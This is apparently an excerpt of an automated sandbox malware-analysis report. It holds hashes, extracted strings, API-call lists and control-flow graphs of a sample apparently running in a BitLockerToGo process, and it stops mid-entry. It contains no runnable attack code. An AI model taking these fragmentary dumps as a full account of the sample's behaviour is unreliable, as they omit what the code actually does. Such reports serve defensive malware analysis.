                                                                                                                                                                                                                                • Source File: 0000000F.00000001.1801236288.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_1_401000_j1XaE_3LRXkWT1prPdjt1dhT.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 8463717ce2ebc620e0488d52d06e0bc20a26d46506bc6afa95368c1635bdf961
                                                                                                                                                                                                                                • Instruction ID: 33fa00c24307905c567e7bad1d0d0c86e88b2feaa46fcbfb76d5c2373a6895e0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8463717ce2ebc620e0488d52d06e0bc20a26d46506bc6afa95368c1635bdf961
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DCE04F70E0A328DFDB00DB55E2443AC77B5AB08308F81819AD46556280CB7C9684CF47
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000001.1801236288.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_1_401000_j1XaE_3LRXkWT1prPdjt1dhT.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 5fca61fec9379d6832dc0ce59f3697efbeb6aa7f7ef63f98e869363abef54284
                                                                                                                                                                                                                                • Instruction ID: 9f2db4b93b4c83d2be6b1e21230e1a067136dadb6ab28473b92159d441b1cdb0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fca61fec9379d6832dc0ce59f3697efbeb6aa7f7ef63f98e869363abef54284
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26E01AB490020E9BCF00EF98C5855AEBBF8FB45304F904829D850F7380DB74AA05CBA6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000001.1801236288.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_1_401000_j1XaE_3LRXkWT1prPdjt1dhT.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 5a331d7e172f57d99ad6810618d04adaa48e438d491e2d35c903d4b2107b79e2
                                                                                                                                                                                                                                • Instruction ID: 410a301262cdc886cb3c6de622ae456f386542b3084d19ba4d4ce0bfc39d0008
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a331d7e172f57d99ad6810618d04adaa48e438d491e2d35c903d4b2107b79e2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4E0EC30C08208A7CB14AFE6D04939DB7B49B01308F0194AA945166391D2BCA689DF4A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000001.1801236288.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_1_401000_j1XaE_3LRXkWT1prPdjt1dhT.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e603e5356343c7ba5d97d4c2a7f5c2510b4507ad8a33e6f214f04776b65325b6
                                                                                                                                                                                                                                • Instruction ID: 11b899a445facac94ccfde96a78466d8d6b234612417cdc327e8b8cfdb2d6fd1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e603e5356343c7ba5d97d4c2a7f5c2510b4507ad8a33e6f214f04776b65325b6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FE08C34C04208FBCB149BD6C0483DCB7B55B02308F408046C81222281E2BC85C5CF06
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000001.1801236288.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_1_401000_j1XaE_3LRXkWT1prPdjt1dhT.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: f95e1d1686aa2d85e75a5b76105a39edbea34d5be1c8293ee2c27c9b3b8b4c6f
                                                                                                                                                                                                                                • Instruction ID: 823b291acbca71834e42e4544fd09270b3682b5452433e53e86c167aeb8dcde4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f95e1d1686aa2d85e75a5b76105a39edbea34d5be1c8293ee2c27c9b3b8b4c6f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DBE0EC70D48208EBCB14ABA5C14979D77B45B02384F10946A945567390D2BCB588CF47
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000001.1801236288.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_1_401000_j1XaE_3LRXkWT1prPdjt1dhT.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: dd15a033516a47962fe096b388093952af5673b694ee651b11153bab6183d13b
                                                                                                                                                                                                                                • Instruction ID: 10ed95a5753b8e6c75622c040a5fa8bba49b6c48a845a7c4dcd9501a5e61e9bc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd15a033516a47962fe096b388093952af5673b694ee651b11153bab6183d13b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41E0EC30948208E7CB14DBA5C0497EE77B49B01304F00D496D46566350C2BC95CACF4A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000001.1801236288.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_1_401000_j1XaE_3LRXkWT1prPdjt1dhT.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 4d9844bf40800bd1ac25cf529c985842a389128921b3a8de3dbd0db73ed4a9d9
                                                                                                                                                                                                                                • Instruction ID: 3f4ef495f878873e58fb35099b6b688a70c2cd9330777c692797e95d56a72f82
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d9844bf40800bd1ac25cf529c985842a389128921b3a8de3dbd0db73ed4a9d9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6AF0B9B4A0430ADFCB40DF69D184A9EBBF0AB48354F10886AFCA8D7340D375EA549F52
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000001.1801236288.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_1_401000_j1XaE_3LRXkWT1prPdjt1dhT.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 38bf5ad5b8ce84d10d9ebd52a251a83f1ebb16b9f641e85055269330a6cc56b2
                                                                                                                                                                                                                                • Instruction ID: 507a2eeb1b1294fc019c15bc0217daacbfa3cbc24380d80bd514c1566703275a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38bf5ad5b8ce84d10d9ebd52a251a83f1ebb16b9f641e85055269330a6cc56b2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DCE0DEB490834ADFCB40DF28C184A8ABBE0BB48350F10882AFC98D3301E374E9559F52
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000001.1801236288.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_1_401000_j1XaE_3LRXkWT1prPdjt1dhT.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 8aff21b7dae71a2c7a639db36e2eb8537a18bfdf791133ad09f4098e112fd0aa
                                                                                                                                                                                                                                • Instruction ID: 74064ba31eee17c0962e0a479fbcf177be5d7ac8196b3f68f90175eebd8ebc57
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8aff21b7dae71a2c7a639db36e2eb8537a18bfdf791133ad09f4098e112fd0aa
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70D092B86003089FDB00FF6CC486A083BF4BB4A344F410194E9958B3A2D774E9489B82
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000001.1801236288.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_1_401000_j1XaE_3LRXkWT1prPdjt1dhT.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 080fd1e3557196b74d22de990d8e0be88bbf414cf2452a44ca6961226d1cbf98
                                                                                                                                                                                                                                • Instruction ID: a463f8b7a0b26e56c82c10047c1a090c5be13bb925c4132e15e81837996aefbb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 080fd1e3557196b74d22de990d8e0be88bbf414cf2452a44ca6961226d1cbf98
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83E07EB4944249AFCB40DF59D18469EBBF0AB48350F11885AF868D7350D339E9519F52
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000001.1801236288.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_1_401000_j1XaE_3LRXkWT1prPdjt1dhT.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 58962bcf0268976518a944043c545924709f6fccb2c2a2946bf48f0e0aa200e6
                                                                                                                                                                                                                                • Instruction ID: 6bb07ff7d33416d8d657091be81e9cd3637a72a56203fd608e2e78280ab26a08
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58962bcf0268976518a944043c545924709f6fccb2c2a2946bf48f0e0aa200e6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65D0C9382007049FC700EF68C089A087BF4AB49344F418494F9858B361D374E8449B81
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000001.1801236288.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_1_401000_j1XaE_3LRXkWT1prPdjt1dhT.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 9d119b2c70391937a3674162939627ab18c86fdfcf8374d0ad2653d8e3a6d04a
                                                                                                                                                                                                                                • Instruction ID: cacaf1a0d8ccc3fc4a41c37eaaebe647985871e160935387d7ca56a92b9fff1b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d119b2c70391937a3674162939627ab18c86fdfcf8374d0ad2653d8e3a6d04a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0C01274D0030D9BCB00EF69D5C244DB7F8FB45204F408454E854EB340D230E5018F41
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000001.1801236288.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_1_401000_j1XaE_3LRXkWT1prPdjt1dhT.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: f84485ff7f9c9b4cedcc48d702e9f004c9719b314da20f7362202d03c12abf60
                                                                                                                                                                                                                                • Instruction ID: 353bb7aeb161a9a55974c247b03cddc9aa7ff4a872f7155e588c761e84640a20
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f84485ff7f9c9b4cedcc48d702e9f004c9719b314da20f7362202d03c12abf60
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2D0BCB8608319EFCB80DF28D58455EBBE0BB48350F10C91ABC98C7301D274D9509F52
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000001.1801236288.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_1_401000_j1XaE_3LRXkWT1prPdjt1dhT.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: cecf440800046c7c8e46e01f770f5e562c6008d3f5747104189a094f57fe0172
                                                                                                                                                                                                                                • Instruction ID: 42c8a659cd893715962a17de92b3f8c954714bb339a409b417d5aa8b881d0eb1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cecf440800046c7c8e46e01f770f5e562c6008d3f5747104189a094f57fe0172
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDA0127050020097CB107FA4C04505876E09B81248F0124046CA1D3240C174C9804A40
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000001.1801236288.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_1_401000_j1XaE_3LRXkWT1prPdjt1dhT.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 989ce7ee9c73be9634bddd42c86f1bd0ada3115d1578385101363852cfe8a714
                                                                                                                                                                                                                                • Instruction ID: 78520e890cdc74977a82b4689c45b45c167e7e8a92feb5645513dd1ab16f256d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 989ce7ee9c73be9634bddd42c86f1bd0ada3115d1578385101363852cfe8a714
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FC00231504B168FCA544F20D900391B7B0FB0A328F624719C976272D1C37579979FC6
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000001.1801236288.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_1_401000_j1XaE_3LRXkWT1prPdjt1dhT.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: "(w$mw$mw$hu
                                                                                                                                                                                                                                • API String ID: 0-1398205897
                                                                                                                                                                                                                                • Opcode ID: 2bf380e51af120ffc1b17ad2cbde6ba558f3856f72b2968f9ff05c9f06a0dd81
                                                                                                                                                                                                                                • Instruction ID: 3a8b42504b19a0a6e2e600b3f8fe2adfe02b573e87cfa21341c0b30c94b16c25
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2bf380e51af120ffc1b17ad2cbde6ba558f3856f72b2968f9ff05c9f06a0dd81
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7701CEB4C0024D9BCF00DF94D8854DEBBF4BB48348F50852AD925BB200E7B89A488F95

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:1.4%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                Signature Coverage:31%
                                                                                                                                                                                                                                Total number of Nodes:42
                                                                                                                                                                                                                                Total number of Limit Nodes:3
                                                                                                                                                                                                                                execution_graph 19142 40cfd0 19143 40cfd9 19142->19143 19144 40d221 ExitProcess 19143->19144 19145 40cfe1 GetInputState 19143->19145 19146 40cfee 19145->19146 19147 40cff6 GetCurrentThreadId GetCurrentProcessId 19146->19147 19148 40d021 19146->19148 19147->19148 19148->19144 19149 43be52 RtlAllocateHeap 19150 40e871 19151 40e954 19150->19151 19154 40f690 19151->19154 19156 40f720 19154->19156 19155 43f2e0 RtlFreeHeap RtlReAllocateHeap 19155->19156 19156->19155 19157 40e9a4 19156->19157 19158 43fe11 19159 43fe31 19158->19159 19161 43febe 19159->19161 19165 43f3f0 LdrInitializeThunk 19159->19165 19164 43f3f0 LdrInitializeThunk 19161->19164 19163 43fffb 19164->19163 19165->19161 19119 43fd47 19120 43fd50 19119->19120 19123 43f3f0 LdrInitializeThunk 19120->19123 19122 43feed 19123->19122 19124 442da0 19126 442dc5 19124->19126 19125 442e4f 19127 442f1e 19125->19127 19131 43f3f0 LdrInitializeThunk 19125->19131 19126->19125 19130 43f3f0 LdrInitializeThunk 19126->19130 19130->19125 19131->19127 19171 410054 19172 41007e 19171->19172 19172->19172 19173 43f2e0 RtlFreeHeap RtlReAllocateHeap 19172->19173 19175 4105f3 19172->19175 19176 43be60 19172->19176 19173->19172 19177 43bf70 RtlFreeHeap 19176->19177 19178 43bf7c 19176->19178 19179 43be78 19176->19179 19177->19178 19178->19172 19179->19177 19137 43f5ef 19138 43f62c 19137->19138 19139 43f95e 19138->19139 19141 43f3f0 LdrInitializeThunk 19138->19141 19141->19139
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: $#$HIVw$HIVw$lo$q<>1$q<>1$rm
                                                                                                                                                                                                                                • API String ID: 0-1373086712
                                                                                                                                                                                                                                • Opcode ID: 93b5a4f87a3a0ee1d89f89301c380d21bae73b00d8aa200b83b1fd639575c703
                                                                                                                                                                                                                                • Instruction ID: 27a2eafe56937117f320f4e4a3f4973fa5bf2692b0ebdecd6aa74128b42892ef
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93b5a4f87a3a0ee1d89f89301c380d21bae73b00d8aa200b83b1fd639575c703
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E62777820C301DFD304DF15D890A6BB7F2EF9A310F04896DF58987260D7B89895CB5A

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 228 43f3f0-43f422 LdrInitializeThunk
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LdrInitializeThunk.NTDLL(004121E9,?,00000001,00000000), ref: 0043F41E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID: !A
                                                                                                                                                                                                                                • API String ID: 2994545307-1769336953
                                                                                                                                                                                                                                • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                                                                                                • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 288 43f5ef-43f62a 289 43f667-43f677 288->289 290 43f62c-43f62f 288->290 292 43f691-43f86b call 43d9a0 289->292 293 43f679-43f67f 289->293 291 43f630-43f665 290->291 291->289 291->291 298 43f881-43f8ec 292->298 299 43f86d 292->299 295 43f680-43f68f 293->295 295->292 295->295 301 43f937-43f942 298->301 302 43f8ee-43f8ef 298->302 300 43f870-43f87f 299->300 300->298 300->300 304 43f983-43f99d 301->304 305 43f944-43f94f 301->305 303 43f8f0-43f935 302->303 303->301 303->303 306 43f950-43f957 305->306 307 43f960-43f966 306->307 308 43f959-43f95c 306->308 307->304 310 43f968-43f97b call 43f3f0 307->310 308->306 309 43f95e 308->309 309->304 312 43f980 310->312 312->304
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: @$_^]\
                                                                                                                                                                                                                                • API String ID: 0-308215939
                                                                                                                                                                                                                                • Opcode ID: 93f5fc3528e170bdcd78e25397dcc789603c7ab1b186dd7c82c548156c9f7048
                                                                                                                                                                                                                                • Instruction ID: 149fe9a218d775d7b41a1fbec3e309ea89f19b5b3ac3c182ec13865c70fd97ec
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93f5fc3528e170bdcd78e25397dcc789603c7ab1b186dd7c82c548156c9f7048
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5516BB4D002099BDF18CF98C9907BEB7B1FF49304F645069D445AB350E7399A0ACB58

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 361 43f2e0-43f2f5 362 43f3c3-43f3cf call 43be60 361->362 363 43f3b2-43f3bb call 43bdc0 361->363 364 43f3d0-43f3d6 call 43be60 361->364 365 43f30a-43f327 361->365 366 43f3df 361->366 367 43f3bd 361->367 368 43f2fc-43f303 361->368 362->364 372 43f3e1-43f3e7 363->372 364->366 370 43f329 365->370 371 43f39c-43f3b0 RtlReAllocateHeap 365->371 366->372 367->362 368->362 368->364 368->365 368->366 368->367 376 43f330-43f39a 370->376 371->372 376->371 376->376
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0043F3AA
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                • Opcode ID: 061d718515a07eaa2b091f1cb931f07322ebe8316d7900d694a2b02c3015163d
                                                                                                                                                                                                                                • Instruction ID: 90adcdaba553512683d68e6fbcae4a43336528eaf7db7a619209832dd03d2112
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 061d718515a07eaa2b091f1cb931f07322ebe8316d7900d694a2b02c3015163d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D72128B5609200DBD70CDF25D8D066FB7E2EFCA309F09953DD58647351C7389816CA8A

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 0 40cfd0-40cfdb call 43dc90 3 40d221-40d223 ExitProcess 0->3 4 40cfe1-40cff0 GetInputState call 4357c0 0->4 7 40cff6-40d01f GetCurrentThreadId GetCurrentProcessId 4->7 8 40d21c call 43f2c0 4->8 10 40d070-40d095 7->10 11 40d021 7->11 8->3 12 40d097 10->12 13 40d0ce-40d0d0 10->13 14 40d030-40d06e 11->14 15 40d0a0-40d0cc 12->15 16 40d0d6-40d0f2 13->16 17 40d1a8-40d1cd 13->17 14->10 14->14 15->13 15->15 18 40d0f4 16->18 19 40d139-40d15b 16->19 20 40d209 call 40e320 17->20 21 40d1cf 17->21 22 40d100-40d137 18->22 19->17 23 40d15d-40d15f 19->23 27 40d20e-40d210 20->27 24 40d1d0-40d207 21->24 22->19 22->22 26 40d160-40d1a6 23->26 24->20 24->24 26->17 26->26 27->8 28 40d212-40d217 call 4110c0 call 40fd70 27->28 28->8
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess$ExitInputStateThread
                                                                                                                                                                                                                                • String ID: 98?>$=<#"
                                                                                                                                                                                                                                • API String ID: 1029096631-575674944
                                                                                                                                                                                                                                • Opcode ID: eeaac0176e9bd95b750053610c1b0c0209064ecea9bb2b64a10cdd4eabc2289a
                                                                                                                                                                                                                                • Instruction ID: 952100317ba4a8b377e1361de29d466cf01f0d4eb80d59b23b938ab903300bf8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eeaac0176e9bd95b750053610c1b0c0209064ecea9bb2b64a10cdd4eabc2289a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B51067490C2408BC305EF69D490A1EFBE1EF96704F14892EE5C9DB392C73AD856CB5A

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 344 43be60-43be71 345 43bee2-43bef7 344->345 346 43bf62 344->346 347 43bf60 344->347 348 43bf70-43bf74 RtlFreeHeap 344->348 349 43be78 344->349 350 43bf48-43bf56 344->350 351 43bf68-43bf6f 344->351 352 43be7e-43be93 344->352 353 43bf7c-43bf82 344->353 354 43bf3b-43bf3f 345->354 355 43bef9 345->355 346->351 347->346 348->353 349->352 350->347 351->348 356 43be95 352->356 357 43bedb-43bedf 352->357 354->350 359 43bf00-43bf39 355->359 358 43bea0-43bed9 356->358 357->345 358->357 358->358 359->354 359->359
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000), ref: 0043BF74
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
